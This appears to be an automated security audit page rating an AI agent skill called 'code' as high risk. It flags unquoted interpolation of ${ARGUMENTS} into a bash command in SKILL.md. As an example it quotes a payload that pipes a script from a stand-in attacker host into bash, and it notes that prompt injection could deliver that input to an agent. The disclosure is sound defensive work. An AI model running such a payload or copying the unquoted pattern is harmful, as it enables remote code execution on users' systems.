code
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): Shell command injection vulnerability in the implementation logic.
- Evidence: The file SKILL.md contains the command
code ${ARGUMENTS:-.}within a bash block. - Vulnerability: The
${ARGUMENTS}variable is interpolated directly into the shell string. A malicious user or an indirect prompt injection attack could provide input like; curl http://attacker.com/malware | bashwhich would result in the execution of the attacker's script. - Impact: Complete system compromise through arbitrary code execution.
Recommendations
- AI detected serious security threats
Audit Metadata